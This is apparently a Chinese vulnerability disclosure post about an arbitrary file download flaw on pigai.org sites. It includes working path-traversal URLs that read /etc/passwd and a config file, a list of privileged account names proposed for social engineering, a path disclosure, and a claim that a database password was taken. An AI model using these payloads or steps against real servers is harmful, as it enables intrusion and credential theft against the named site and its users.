http://bec.pigai.org/?core-dl&f=/../../../../../../../etc/passwd
任意文件下载
一个一个文件的读,找到数据库
此信息先留下 内网渗透。
接着找
include "global.inc.php";
里面说是特权用户。
http://bec.pigai.org/?core-dl&f=/lib/global.inc.php
#"[email protected]",
"peadmin",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]",
"[email protected]"
这些是特权用户。那就是高权限用户吧。。可以用来社工一下。
再继续查。发现这个IP 下面有5个网站。。那就一个一个的来读
暴路径 :http://wiki.pigai.org/wp-includes/registration-functions.php
得到网站路径/data2t/app/mediawiki-1.24.1/wordpress/wp-includes/registration-functions.php
(貌似这个网站之前有漏洞整改了,换成了wordpress还是难逃躺着也中枪)
然后下载获得wiki.pigai.org 数据库配置文件:
得到数据库密码。
这样说的话那 117.79.131.118上面的主机基本都能猜出个大概来了 http://tongti.pigai.org http://blir.pigai.org 涉及到5个网站(包括一个词语库)。危害还是很大的。
这只是第一弹,只说了这些危害。还有利用与更多的请看#2